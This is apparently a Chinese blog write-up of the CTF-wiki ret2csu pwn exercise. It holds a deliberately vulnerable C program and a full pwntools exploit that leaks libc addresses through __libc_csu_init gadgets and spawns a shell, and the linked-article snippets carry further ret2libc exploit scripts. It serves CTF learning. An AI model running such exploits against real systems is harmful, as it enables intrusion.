wikiCTF-pwn-ret2csu

最新推荐文章于 2024-12-05 19:50:50 发布
原创 最新推荐文章于 2024-12-05 19:50:50 发布 · 516 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #python

ret2csu

在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。 这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。这个函数是用来对 libc 进行初始化操作的,而一般的程序都会调用 libc 函数,所以这个函数一定会存在。我们先来看一下这个函数 (当然,不同版本的这个函数有一定的区别)
也就是通用gadgets
ret2csu—通用gadgets
复现level5

编译
gcc -m32 -fno-stack-protector -z execstack -o level5 level5.c

-m32意思是编译为32位的程序
-fno-stack-protector和-z execstack这两个参数会分别关掉DEP和Stack Protector

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
    write(STDOUT_FILENO, "Hello, World\n", 13);
    vulnerable_function();
}

在这里插入图片描述

首先是栈溢出漏洞,其次,由于是64位程序,所以需要控制gadgets,
这里使用的是通用gadgets
也就是ret2csu

利用过程:

  • 第一通过栈溢出 泄露write的got
    然后就是通过libc中的偏移
    计算出system的got
print("##### get write_addr #####")
payload1 = 'a'*0x88
payload1 += p64(csu_pop_addr)
payload1 += p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)
payload1 += p64(csu_mov_addr)

payload1 += 'a'*0x38
payload1 += p64(func_addr)
p.recvuntil("Hello, World\n")
p.send(payload1)
write_addr = u64(p.recvn(8))
print(hex(write_addr))

system_addr = write_addr - offset_addr
bin_sh = write_addr - bin_sh_addr
print(hex(system_addr)+","+hex(bin_sh))

这里一个是可以用Libcsearcher库找libc文件
另一个就是通过ldd查看二进制文件的libc文件
ldd level5
在这里插入图片描述

  • 第二个payload就需要写入system的地址和‘/bin/sh’字符串
    因为在csu中,system的参数是由edi传入的
    只能传入4字节地址
    但是实际使用时rdi,8字节
    这里向bss写入则是因为bss的地址长度就是4字节长度
    在这里插入图片描述

payload2

print('##### load bin_sh to bss ')
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(read_got)+p64(16)+p64(bss_addr)+p64(0)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
p.send(payload2)
sleep(1)
p.send(p64(system_addr)+"/bin/sh\0")
  • 最后就是获取shell了
print("##### get--shell #####")
payload3 = 'a'*0x88
payload3 += p64(csu_pop_addr)
payload3 += p64(0)+p64(0)+p64(bss_addr)+p64(0)+p64(0)+p64(bss_addr+8)
payload3 += p64(csu_mov_addr)

完整exp

from pwn import *

elf = ELF("level5")
libc = ELF("libc.so.6")

p = process("./level5")

##### address #####
csu_pop_addr = 0x40061a
csu_mov_addr = 0x400600
bss_addr = elf.bss()
func_addr = elf.symbols['vulnerable_function']
offset_addr = libc.symbols['write'] - libc.symbols['system']
bin_sh_addr = libc.symbols['write'] - libc.search('/bin/sh').next()
write_got = elf.got["write"]
read_got = elf.got['read']
##### payload1 #####
print("##### get write_addr #####")
payload1 = 'a'*0x88
payload1 += p64(csu_pop_addr)
payload1 += p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)
payload1 += p64(csu_mov_addr)

payload1 += 'a'*0x38
payload1 += p64(func_addr)
p.recvuntil("Hello, World\n")
p.send(payload1)
write_addr = u64(p.recvn(8))
print(hex(write_addr))

system_addr = write_addr - offset_addr
bin_sh = write_addr - bin_sh_addr
print(hex(system_addr)+","+hex(bin_sh))

##### payload2 #####

"""

print("##### get--shell #####")
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(system_addr)+p64(0)+p64(0)+p64(bin_sh)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
raw_input()
p.send(payload2)

"""
##### this is wrong payload2,bin_sh is 8bytes,but edi is 4bytes so must to move to bss(4bytes address)

print('##### load bin_sh to bss ')
payload2 = 'a'*0x88
payload2 += p64(csu_pop_addr)
payload2 += p64(0)+p64(1)+p64(read_got)+p64(16)+p64(bss_addr)+p64(0)
payload2 += p64(csu_mov_addr)

payload2 += 'a'*0x38
payload2 += p64(func_addr)
p.send(payload2)
sleep(1)
p.send(p64(system_addr)+"/bin/sh\0")

##### payload3 #####
print("##### get--shell #####")
payload3 = 'a'*0x88
payload3 += p64(csu_pop_addr)
payload3 += p64(0)+p64(0)+p64(bss_addr)+p64(0)+p64(0)+p64(bss_addr+8)
payload3 += p64(csu_mov_addr)
#raw_input()
p.send(payload3)
p.interactive()

结果
本地打通了 远程倒还没试(没搭过QAQ)
在这里插入图片描述
结束~

Oops-re
关注
PWN-中级ROP-[HNCTF 2022 WEEK2]ret2csu
Welcome To Myon'Blog !
06-06 1327
本文分析了64位程序中利用__libc_csu_init函数进行栈溢出攻击的技术。通过控制寄存器传递参数,结合ret2csu技术泄露write函数地址,最终实现ret2libc攻击。文章详细讲解了gadgets选择、参数传递方法和攻击流程,并提供了完整的攻击脚本(exp)。该技术在不直接获取system函数和/bin/sh字符串的情况下,成功获取了shell权限,最终得到了flag。
CTFWiki-pwn
qq_55233040的博客
05-03 1614
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 474
PWN-栈溢出之ret2csu
PWN-ret2csu
recover517的博客
12-06 654
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
PWN:[WEEK2]ret2csu
m0_53932372的博客
10-19 294
pwn
pwn中级ROP——ret2csu
turtlesd的博客
04-27 1486
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
wikictf-boverflow
测试
09-13 267
  wikictf上的一道题:链接:https://pan.baidu.com/s/183xQZQS7YwVFCoMhtX9dtg 密码:ep5s  可以看到文件时.dms结尾的文件,没见过,不过我们先用010editor分析一下他的结构:   是elf文件,是Linux下的可执行文件,Linux是不以后缀来区分文件类型的,所以到Ubuntu运行一下程序: ...
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 3606
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
pwn学习-ret2libc2
Sa1nZen的博客
06-16 283
pwn学习-ret2libc2
pwn学习-ret2libc1
Sa1nZen的博客
06-02 380
pwn学习-ret2libc1
pwn学习笔记(9)-中级ROP--ret2csu
qq_66013948的博客
08-09 518
​ 首先是64位文件的传参方式:前六个参数是从左到右放入寄存器:rdi、rsi、rdx、rcx、r8、r9,之后的通过栈传参。​ 比如:传参函数大于7个:h->(%esp)g->(%esp)call H​ 之后反汇编一下main函数和H函数的代码​ 很明显的就是前六个参数是寄存器传参,剩下两个就是栈传参。
CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86
A的博客
06-14 735
先看这个文章学习函数调用栈出栈时RIP指向栈存放函数返回地址的位置,这个地址我们可以改为一个汇编指令的地址,RIP一直往后面指,以那个地址为起点一直往后执行 把函数返回地址设为0804863A,会一直往后执行 ret2shellcode 把恶意汇编代码写到数组(代码块)里面,返回地址指向这个数组(代码块)首地址。 这个数组要可读写执行,全局变量(.bss)有这个特点 ljust() 用法 shellcraft.sh() 打印结果 计算偏移disass main反汇编 main 函数找到 main 的第一条指
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 1064
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
ctf wiki pwn(入门实操)
至臻求学,胸怀云月
01-11 2565
gets函数溢出 源码 #include <stdio.h> #include <string.h> void success() { puts("you are succeed!"); } void volunter() { char s[12]; gets(s); puts(s); re...
从ctfwiki开始的pwn之旅 4.ret2libc
2301_80361487的博客
12-05 1426
当一个函数被调用过后,got表里保存了他在内存中的地址,可以通过泄漏got表内存来泄漏函数地址,然后可以根据起泄漏的函数地址获得其libc版本,从而计算其他函数在内存空间中的地址。为什么不能直接跳到got表,通过前面的前置知识我们知道plt表中的地址对应的是指令,got表中的地址对应的是指令地址,而返回地址必须保存一段有效的汇编指令,所以必须要用plt表。可执行文件里保存的是plt表的地址,对应plt地址指向的是got的地址,got表指向的是glibc中的地址。经在 ida 中查找,确实也存在。
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2372
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1031
CTF-wiki的注解:ret2shellcode
跟着CTF-wiki学pwn——前言
qq_42882717的博客
06-18 1662
对于有一定pwn基础的同学来讲,CTF-wiki就是yyds,绝绝子,很上头呀。不过简洁有力的另一方面,是细节不彻底,因此本系列文章专为解决CTF-wiki的细节问题
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1267
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
[HNCTF 2022 WEEK2]ret2csu
最新发布
12-27
### HNCTF 2022 WEEK2 ret2csu Challenge Solution #### 利用ret2csu技术实现漏洞利用 在处理`HNCTF 2022 WEEK2`的`ret2csu`挑战时,目标是通过控制程序流来调用特定函数并最终执行任意命令。此方法依赖于对`.text`段内存在的gadget链的应用以及对动态链接过程的理解。 为了完成这一攻击向量,首先需要找到合适的gadgets用于操控寄存器状态,并且能够触发`__libc_csu_init()`函数内的逻辑路径,该部分代码负责初始化全局构造器数组,在某些情况下可用于间接调用其他库函数如`write()`或`read()`等[^4]。 具体来说: - 使用`pwndbg cyclic`工具生成模式字符串并向服务端发送以定位崩溃发生的确切位置;之后借助`pattern offset`确定偏移值以便后续操作。 - 构造payload时应考虑如何填充堆栈帧使得当返回至`__libc_csu_init`时能正确设置参数传递给想要调用的目标函数(比如`puts@plt`),进而泄漏出关键内存地址信息(例如`got.plt`表项)。这些数据对于计算实际加载基址至关重要,因为它们允许我们推断出整个共享对象映射范围的位置。 - 接下来就是准备第二个阶段的有效载荷——通常是一串精心设计过的字节序列,它会被解释成机器指令从而绕过保护机制达成目的。这里可以通过泄露得到的信息调整base指针指向所需功能入口处(像`system()`)再配合伪造参数列表达到远程代码执行的效果。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') io = remote('target_ip', port) # 泄露 libc 地址 rop = ROP(elf) pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0] puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] payload_leak = flat({ offset: [ pop_rdi_ret, puts_got, puts_plt, main_function_address # 返回到main或其他安全地方继续运行 ] }) io.sendlineafter(prompt, payload_leak) leaked_puts = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) log.success(f'Leaked puts address: {hex(leaked_puts)}') # 计算 system 和 binsh 的真实地址 libc_base = leaked_puts - libc.symbols['puts'] system_addr = libc_base + libc.symbols['system'] bin_sh_str = next(libc.search(b'/bin/sh\x00')) + libc_base # 准备 final payload 执行 /bin/sh final_payload = flat({ offset: [ pop_rdi_ret, bin_sh_str, system_addr ] }) io.sendline(final_payload) io.interactive() ``` 上述脚本展示了如何构建一个完整的exploit流程,包括但不限于发现溢出点、获取必要的库版本细节、解析符号表条目直至最后成功获得shell访问权限[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值